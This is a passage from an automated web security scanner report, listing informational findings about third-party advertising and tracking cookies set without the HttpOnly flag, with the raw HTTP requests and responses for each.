yGMuPK371XlXjo5X46eVqRbV699MOJ5eDdshYLSs5LFoOgILjO_vdFh0XnPmUquTICkH1HrsiJSZNWOX0SyN8dywaeYYZUTlRetsuBzMcxMWLQLNyiRU1bJ5Qpb7GomgPhXBwcMjXa09KP5HzekSxDcQK0SJw0JMmSyeQM3pYTVx-Ci-FU5aKfMy17HNvPHxNvxNrRXY1izURX-lyALi1AlxuBXTDiJUS-OqKWjm2DD4CuggKG3dUzHMmu04fSX5Ad4nEc6NlGzZLMuoExgCCt30kp2pmOmYcQYMZyZ05DubgihMl8PJOwcr8ldScAKqk7rGGnUh27gMWCyrnP1Di5AGzTucfcXTrqV1UJKyBhGxFYcQFai9M2J3rqJmFUgQdN5ATDIRwfK3uozaJUKhU4qVipaL_GD-TOTelik5DYCvXIYIInb3nfIa-ebQa7olHWWH486R4yxje4LN8GWCWWRe4IR0I9DtTjuVzRJkyZ8n66XpUPlCRi3tlvuMEH6BKrtjGsUA2wOoIXFuaM_JUwMHDgab4_aPrZdgl9Uf7tvD9rgyRTxnR6YKNm8Gu6ALXRmCYGTIP8i-wsqx8QkqNgi0F_hs9UZaVZDpy-HyTAsx-Y51cz4yJITcb0FaAWC4QbaWSbbOECFNVbSmOiTVVH4eEKD1WvX5M7UplxrzwIhN9Mwkgo1sMiNanUUl1UyNj_Qxjp4iBCha2ShvDZxpY4-NTPO_cWHxychz2AkV4XXIJ0g; uid=2931142961646634775; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C7%7C7%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7C1007%7C1008; rds=15104%7C15104%7C15104%7C15104%7C15085%7C15104%7C15104%7C15082%7C15104%7C15104%7C15104%7C15104%7C15104%7C15104%7Cundefined%7C15104%7Cundefined%7C15097%7C15093; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 05-Nov-2011 14:00:15 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:15 GMT

GIF89a.............!.......,...........D..;

10.103. http://r.turn.com/server/pixel.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=Dza9cImQIgAOYp1sdVBFKJ3j2mm-3nw5DLdjMDY9RiDfaqaDzVRu9ZiuBStYaftY-vQa-Lrt8AEh2sMWSofalPWfoLMBxH0g9IiAwEZtd5YPMEpw2Dimbl_Ar_3pbVlWCr9zpcNmhJ4YALFsRS0OjTgV6OPboE5AailwYD2p-IySdlkZutLQ7ZQ85RG7C4VB2qlA743KvZ39ywpdZbpMhh0Lmtiu91APHHd__cAh9gz07Cd5Zg6Jg2z-OuW7NiYiFK2x3qhPSvxxgQjvFMzvNsv0sG_uSycuZycGHG0i9JDVJjS_HVyCCR3CpH4C_z7OWENSx6qTFa7od7SUHN9Egei6BZRgi_D5YzTOICCuYCx9jiGo5Ucxoan5H4AQ_xV3iHql4u4O7_sSYdnd02k2DNQHkfpT4yC0sBHWKifDZRo8VXe-PeWk1nfFtbmH7GvZ1QMXO5GUno07zoygwBocRoTsxUcxWk5nbrSqN6k58j1TORmwcQ4tlm0RwihyF_UsCL2x9N8rCbkNMc9dtlOLKF16IBansyDt77nh-l623XjbgLPXgE5UhrKbb-yapi7Iz_t1m3RC9HNVGEroWY24Hx0ymz9iB_PZ274hwZ5aW0QB1cBEZ955Qck8jqa4MZ7v1aY1ttiEjhYPnmeJ7sqVaGWGUflWpKK8ZDluGXe-OMAMpHNeDinV6bUD4c7xTKPYqOV7QZ7aFBA3m0phFzvLGUyTINTvrbznNuEHAKkRnaoKqQQIp4dB6WERi9SKRUeAKB26GseFkfH7OU-Y9jArFwJN1aNKu26HMlC2vlBlEo3AibJolRtP9GKY2j0AIA4QF0ROUKwFAxzf5GHHC-l2sUbwMrieaxWXba1ERSK3tWWrKuMIkiwSl3Te1VhilaTSnNbIlFewbQ0HwOyAYWPKVOFzsrgdqMMSA-afxC3bSvIKc60386S8NF-JuqnS_gYeiHql4u4O7_sSYdnd02k2DGktwZFEgr-H1aRa-v8iL2Y8VXe-PeWk1nfFtbmH7GvZojS9aaLdC4dIDTz1p5oDzGZlZrZQz9gqPi_YpBWRR_zyJstfeR3BF0X80yINyf_bnscLz8pWZl03MCHITMyErF16IBansyDt77nh-l623XgQrvHzCa6-Ar3OKf1u5O9co8jF4KazkjYUhi9Y-2cpubMeTwvrsn6UDDgstfmlQPoNQYQoyiD68kJjw-yNw0ZU1aY1ttiEjhYPnmeJ7sqVaHrw4FE_cCyjpsbZ3unV7uMrdoKrhpnovF-eFvpriEhVrMfpGoruuBgzA1-jEhdCS2wFnaEJ_77D-SBSvq4apv0KqQQIp4dB6WERi9SKRUeApAoLbAXgH3MAg4fG-53hwYWvZ7p1zrzJVM0-BhBuMNYrc7Kk7dBes7lnotHfeZ9VkUKGgPT-wupZmNTexU6iznjzwSpHwNAhjAO4xxi375pcdR85v5iezdnNkxnuNwjFRvAyuJ5rFZdtrURFIre1ZZBSlbvBC0evnYqUUsRvAsWc1siUV7BtDQfA7IBhY8pUNZFdTBAhalBFYq3Dyxi9TBfNNCsQZvwCdk93ue_PwR2IeqXi7g7v-xJh2d3TaTYMVxQyOpakzryCsBb1QMcxxTxVd7495aTWd8W1uYfsa9lUSQm6Px99bWr2RVRxuk2yEM0JJ22tYCLP7uBw8UeaI1M5GbBxDi2WbRHCKHIX9Sz_QtJiSnym5S_qsqKzl484XXogFqezIO3vueH6XrbdeBrsNvqpBtQW35VrocWM1hJEMrVYqmvz7xJtELJ71uRTTECD0HA2vYVMATXXOR4kic7TP4ECMD5bQt22Ufb1ASjVpjW22ISOFg-eZ4nuypVoX3-sqUKgtXKTyeeAJ3WoNBTpFHNeMdsJNdx7bmFAC56JAHYn97lyiGJ5XDJCkUNkw_be5i-Fx9NF-BKeFGAMPAqpBAinh0HpYRGL1IpFR4AB4o7EViaAPEO7EwRwS
KXjmcb3GKio9SBOsgaqPfeFsasCu54shXpdyVhXu91m5wiW91g1mAzej0c7wnGxz5vZRvAyuJ5rFZdtrURFIre1ZfDRnDTWzff-YlyXP_zUgfGc1siUV7BtDQfA7IBhY8pUeWxnJe61Raa9uTyiNiaLtdI3rxLW4kElZ2z2lu4o7hWIeqXi7g7v-xJh2d3TaTYML11pzoZIlFkYCIGVGm_tUjxVd7495aTWd8W1uYfsa9nlK9dyZVYIz5pmDpzdU80QQkZpM_cVFXYTcTTPOspL-TBLfO2ZZ5wOsMI8xMfjrvrnuyo8Yez2B_AzlVUYglieXXogFqezIO3vueH6XrbdeOZqLTJ2eUC5VtOBQseHiE81nClsShNFF0lz8B3FOROwHTKbP2IH89nbviHBnlpbRDDco7mBS3_DJ0ZnqsKZKeTVpjW22ISOFg-eZ4nuypVotMax7cw1A0lomZOewLLuUzHWvz6IKIMXKnKL80iX025NYG1qkKS0O8LGs7luRUbTpMVbMDENDpvIJh2_kOeZwWW0-b-WJf0ZFlMOgj84vlCimF9cP6eLyeThS4cELoZF7hIMY-yiS6od8aiwiVy6K8hyJ0-yKCmYc6DEnkoIDjLUURQ9jCbj0adNONAbHq6OIauKDPsVyaYkWyAz1a3QLsZ0HFEk9FUwZlIZoC4PKchFMfXO25PtkA1FJuDF1eIqRRk7NbH_3KXaXpegXdoohM0M5HiSWAEvqit8JfBxvjBBCecmNOFvmnxZXlybKUM3qIhRpr8zAond1hyHy2KCxQ9jRTaSUh9q8NAYC-8-qkSZEZsmx23qKVCrqZDyeipaIi4-WrfUh7IPblkcEwLIfWk4JnPVlR_zGm4PPqzfx4-ZPuIxR87K17SR-59M9UpIVvIMltY5lVfKu7zjIgIpMBKB2P8TaeZb5SMS1Kn2fJf0-MGZW4U9vWHTndk9ZYnTYKRbzB2AW8sPYtx1gLnWIDsYBLT8b4yTE_t-fjXYNBuH2MTsqi1WP1f5naPDjKNVGGv49osHpNOU5hR-g_XrO60jJc9MudtXKgUybYsjSwmSw3Whqt4otLu1R9f4pMroY6TrnX9AFtcCOq4KtB3OqN2gLia6NWPazuloW1Dp_gmgtfmkSSGnmz7Ck--msIbUItDCaX4V_0YzpDgobT5myGAQ1jpLDCI7HiZjNNO0_95EX9SUHeo0SvSjgEUZJK2gWAKmardOPRrryF1DhECcp1-YMQnoV4ZAArTQ0YurxnNN6cMRpOMh2nE5XzpH9jU_75X6gaFQNyuWz4EiPqighnBW1K7ySrDy2erbCyocIlO9iKCeGUvo-FRYRZN7b2HzshKpWim7EvVYj9LxNPbnlLRl7SF6Fz-Cqk4ilR2m1sd6XpoV6J-HdTmFEl8Fex_S_sTGaqkuGDnpWV_Epn14CgCD-1Od2j93-G993DJLn6laQk0A_YEjXCNxN4ufXJe2s8taXVc1ZwCaKwQ-ReuFBa_BvA0MPyd7JlyBvMOrx4RsY1dMYwNR_ohNoy9a29HQKTTBeSdexy7NjxMrQdbG848mPsvXEVp1Zp9tlw0PafTHwRamGgGanwtSRVH2wEa3NxSTCsrM00Brun6QttnrZ4i40yYFMUM2IND36b7ZFw4; fc=qPpK4X8K7ZjxVx0VJZDcdB_D1mN3lHI_BinJ1LdrOAbDh9xILOy7cWXWYifPzZ3iZjzoSdlEeqq3zCQrton2D32iD1a2418t8vlUtDGalV-JhisFugd5-2PmgEb-dzYcx_84B0Gt7iZQiKNqGC2CofHgZs6hnwrt4AvKtyKV8klPR1hRXEWvUhiTNhz33U4d9hTEpcCaiTjdUImk_rGRYl95QzLPGgcS4PLuvzPSDFoeX72gpvVoMR_dT1IU83itQkcPCNDBJR1s8ojl7c8L5k9KWBxjpL-6lYKR74fQmyE; 
pf=WmCQSJv_88YAF1TaCEjacvtFyKtKd3nkimHPVBGJrCArW05u4B9BwnHxy5LHSNbs0PyvhiQ9hEGFvp1qMvxzBcdiicNNmmE_aI2n_-oR-aRG9eqUO6PdyPlHytyWBeL6pt4N9d3OY-Qo6M3zGftguNTbm-VGCKrn7KG61o8a-hlxQgbL-MXnxJnxbWK81XM2fNbwnskl80J7FrpArydV4msv5xJnc6wiNkkgoc9ZHAqEvAXfc_b9CYsOLM4ObfRS-yQ0IxDS6yGV0bt0Oz4pJzQ3Hu9GorHJq3pkzhhXE4dM0xncvVUD6tMlnnlm_qWsojASvNxNlCtZvel71OhRg1_acYxwuGBwWmnpT3WVNmeWKUlZO7GlHHuYkG_xUYpdlRr7vUCIaoiDaMmpt_PvLCOUyLGtO0hHJuwGY5T09JX2RCeAmas1by9-2jjXtHbxIU6XTk6RPEnQXT9x2zEmWfAeEJZ2W4XMeMQpqzhWB_34UH3sPqU14UWUW_0z8Z0heNyepssmwJo9AEHB3dcHG8NqNopQF7bmOYrUClo2LIAxUFIqqMfzF-f5IilV9DF2EEtf1qwB8GY1P6ISMC2NEE-NukVybOAFf3snxZsusnThrdw025CqgpXbAJf_ZgK04z5LE7vpNsVQaepPKy5giom1bq2yFvVGruUD-0Zmu_IOz-UlYiPBN7JyoSoKGJwMowB-sj_YCAwsoyO3MSAriA-6SvpE8vfm17M_AiAxw4nAd1Y9GjRixW8BKZaPBicaTSnQ_qW1THdHtsDrSOwE7yWjUosqwui97JSt4J0g_MOMd0ReLIPTEksHwzd4gYkpoMm2n6Nulr0bAVvGt4WcZWdCKTjb3Ww3q4Lyh_VyGMuPK371XlXjo5X46eVqRbV699MOJ5eDdshYLSs5LFoOgILjO_vdFh0XnPmUquTICkH1HrsiJSZNWOX0SyN8dywaeYYZUTlRetsuBzMcxMWLQLNyiRU1bJ5Qpb7GomgPhXBwcMjXa09KP5HzekSxDcQK0SJw0JMmSyeQM3pYTVx-Ci-FU5aKfMy17HNvPHxNvxNrRXY1izURX-lyALi1AlxuBXTDiJUS-OqKWjm2DD4CuggKG3dUzHMmu04fSX5Ad4nEc6NlGzZLMuoExgCCt30kp2pmOmYcQYMZyZ05DubgihMl8PJOwcr8ldScAKqk7rGGnUh27gMWCyrnP1Di5AGzTucfcXTrqV1UJKyBhGxFYcQFai9M2J3rqJmFUgQdN5ATDIRwfK3uozaJUKhU4qVipaL_GD-TOTelik5DYCvXIYIInb3nfIa-ebQa7olHWWH486R4yxje4LN8GWCWWRe4IR0I9DtTjuVzRJkyZ8n66XpUPlCRi3tlvuMEH6BKrtjGsUA2wOoIXFuaM_JUwMHDgab4_aPrZdgl9Uf7tvD9rgyRTxnR6YKNm8Gu6ALXRmCYGTIP8i-wsqx8QkqNgi0F_hs9UZaVZDpy-HyTAsx-Y51cz4yJITcb0FaAWC4QbaWSbbOECFNVbSmOiTVVH4eEKD1WvX5M7UplxrzwIhN9Mwkgo1sMiNanUUl1UyNj_Qxjp4iBCha2ShvDZxpY4-NTPO_cWHxychz2AkV4XXIJ0g; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C7%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7C1007%7C1008; rds=15093%7C15093%7C15093%7C15097%7C15085%7C15097%7C15097%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7C15097%7C15093; rv=1; uid=2931142961646634775

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 05-Nov-2011 13:59:59 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:59 GMT
Content-Length: 335

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=4369754592172087684&fpid=4&nu=n&t=
...[SNIP]...

10.104. http://r1-ads.ace.advertising.com/site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=923&ts=1304949604772&cm=1148&ac=5&at=1&xvk=60302672.07185271&fd=t&tc=1&rr=t
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=B8ziF3kAAAAAgCsCAEAAgEABAAAABAAAAMAAgEA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAnq2C+ORAgHEGte/mz/DHyJN5VpuB!; C2=bN/xN5pqDIxFGxkovMg3sYU8SKMCItdBwhQ3WXAcIsY4FAHCw3gBwhQ7NYAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIoa4FAHCA9qBwhgdeZAcI4fFGAHCbTeBwhwKOaAcIoN5FAHCC9qBwhwtZaAcIE0rGAHCFBqBwhQTaaAcIY4dGAHCNLqBwVrqDoxsGFftrSQIzaQHRGABg2cxFZm5IaMJxOCBsRphd0I9HsfzFz+i4SQBwWkTltCqGXFseSw7RaIXVSPBrLqRONJUEQT2FyFruTQAzZIX0KHBbzqhcl6BE8sXGyFogRwrgYc4zWdBkoqRwM67FcNNGhWkAbwuRXMUumvBEOpR+NLUGsEpGlIq+bQoeZ4jfOsBgwhB3W7/HUJtGTRZpTrxMFqFH09IGrUo8ew5qYITY6wBsMiBqcAnjagKHEv9FoSqGdQ9fZI2FirZDugxkELJI8GlGlE; GUID=MTMwNDk0OTU5NTsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 14:00:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.884214.743832.0XMC
Set-Cookie: F1=Bg28H3kAAAAAYm1CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 08-May-2013 14:00:08 GMT; path=/
Set-Cookie: BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; domain=advertising.com; expires=Wed, 08-May-2013 14:00:08 GMT; path=/
Set-Cookie: ROLL=boAno2CkdKAgj1G!; domain=advertising.com; expires=Wed, 08-May-2013 14:00:08 GMT; path=/
Set-Cookie: 29047542=_4dc7f368,4264037248,743832^884214^81^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 09 May 2011 14:00:08 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 601

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000743832/m
...[SNIP]...

10.105. http://rt.legolas-media.com/lgrt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=2&ei=9&ti=53&pbi=36&ord=5068520 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=05a5761a-b8e3-4fc1-b933-f9f7eb10c6b9; lgtix=HAACALsA

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:50 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: lgpr=//8=; path=/; expires=Tue, 10 May 2011 13:59:50 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=NQABAL0AHAACALsA; path=/; expires=Sat, 01-Jan-2050 23:59:59 GMT; domain=.legolas-media.com
Content-Length: 0
Connection: close


10.106. http://services.krxd.net/pixel.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://services.krxd.net
Path:   /pixel.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel.gif?_kcp_d=nme.com&_kpid=3efee9db-7d85-4533-9e41-c635ebf2d937&_kcp_s=NME&_kcp_sc=News&_kcp_ssc=news&_kua_loggedIn=no&_kpa_pageTitle=Sufjan%20Stevens%20suffered%20%26%23039%3Bbreakdown%26%23039%3B%20while%20watching%20%26%23039%3BFantastic%20Mr%20Fox%26%23039%3B%20%7C%20News%20%7C%20NME.COM&_kpa_contentId=none&_knifr=14&_kpix_0=http%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4705&_kpix_1=http%3A%2F%2Fwww.burstbeacon.com%2Fview%2F103170%2F64948%2F182030%2F318088%2F3050%2F2D1A28EF%2F&_kpix_2=http%3A%2F%2Fwww.burstnet.com%2Fenlightn%2F7578%2F%2F12A4%2F&_kpix_3=http%3A%2F%2Fb.scorecardresearch.com%2Fb%3FC1%3D8%26C2%3D6035047%26C3%3D201.2%26C4%3Dad20731a%26C5%3D182030%26C6%3D0%26C7%3Dhttp%253A%2F%2Fwww.nme.com%2Fnews%2Fsufjan-stevens%2F56527%26C8%3DSufjan%2520Stevens%2520suffered%2520%2527breakdown%2527%2520while%2520watching%2520%2527Fantastic%2520Mr%2520Fox%2527%2520%257C%2520News%2520%257C%2520NME.COM%26C9%3D%26C10%3D1920x1200%26rn%3D46905169&_kpix_4=http%3A%2F%2Fpixel.quantserve.com%2Fpixel%2Fp-e4m3Yko6bFYVc.gif%3Flabels%3DMusic%2CEntertainment&_kpix_5=http%3A%2F%2Ftrgca.opt.fimserve.com%2Ffp.gif%3Fpixelid%3D287-036699%26diresu%3D154dab7990adc1d6f3372c12&_kpix_6=http%3A%2F%2Fpixel.quantserve.com%2Fpixel%2Fp-e4m3Yko6bFYVc.gif%3Flabels%3DMusic%2CEntertainment&_kpix_7=http%3A%2F%2Ftrgca.opt.fimserve.com%2Ffp.gif%3Fpixelid%3D287-036699%26diresu%3D154dab7990adc1d6f3372c12&_kpix_8=http%3A%2F%2Fpixel.quantserve.com%2Fpixel%2Fp-e4m3Yko6bFYVc.gif%3Flabels%3DMusic%2CEntertainment&_kpix_9=http%3A%2F%2Ftrgca.opt.fimserve.com%2Ffp.gif%3Fpixelid%3D287-036699%26diresu%3D154dab7990adc1d6f3372c12&_kpix_10=http%3A%2F%2Faka-cdn-ns.adtech.de%2Fimages%2F175%2FAd2832047St1Sz16Sq3827014V1Id5.gif HTTP/1.1
Host: services.krxd.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: private, no-cache, no-store
Content-Type: image/gif
Date: Mon, 09 May 2011 14:07:03 GMT
Last-Modified: Tue, 14 Dec 2010 00:06:17 GMT
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
Server: Apache
Set-Cookie: _kuid_=10.83.71.216.1304950023530725; path=/; expires=Sat, 05-Nov-11 14:07:03 GMT; domain=.krxd.net
X-Request-Time: D=102 t=1304950023530639
X-Served-By: logger005.krxd.net
Content-Length: 42
Connection: keep-alive

GIF89a.............!.......,........@..D.;

10.107. http://sitelife.floridatoday.com/ver1.0/Content/images/store/12/1/6c2f9a14-d970-4d97-b1b8-998eda420787.Large.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/Content/images/store/12/1/6c2f9a14-d970-4d97-b1b8-998eda420787.Large.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/store/12/1/6c2f9a14-d970-4d97-b1b8-998eda420787.Large.jpg HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R2831597222; path=/
Content-Length: 16542
Content-Type: image/jpeg
Last-Modified: Sun, 08 May 2011 17:22:20 GMT
Accept-Ranges: bytes
ETag: "7863da7ca4dcc1:6e93"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 13:59:32 GMT

......JFIF.....`.`.....C.........................    ....................!........."$".$.......C.......................................................................`.9.."..............................
...[SNIP]...

10.108. http://sitelife.floridatoday.com/ver1.0/Content/images/store/13/14/3d0cb25d-d19d-4993-ae7a-7bb7b30af008.Large.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/Content/images/store/13/14/3d0cb25d-d19d-4993-ae7a-7bb7b30af008.Large.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/store/13/14/3d0cb25d-d19d-4993-ae7a-7bb7b30af008.Large.jpg HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R2831598311; path=/
Content-Length: 21072
Content-Type: image/jpeg
Last-Modified: Sun, 08 May 2011 17:22:20 GMT
Accept-Ranges: bytes
ETag: "9b677d7ca4dcc1:6e93"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 13:59:32 GMT

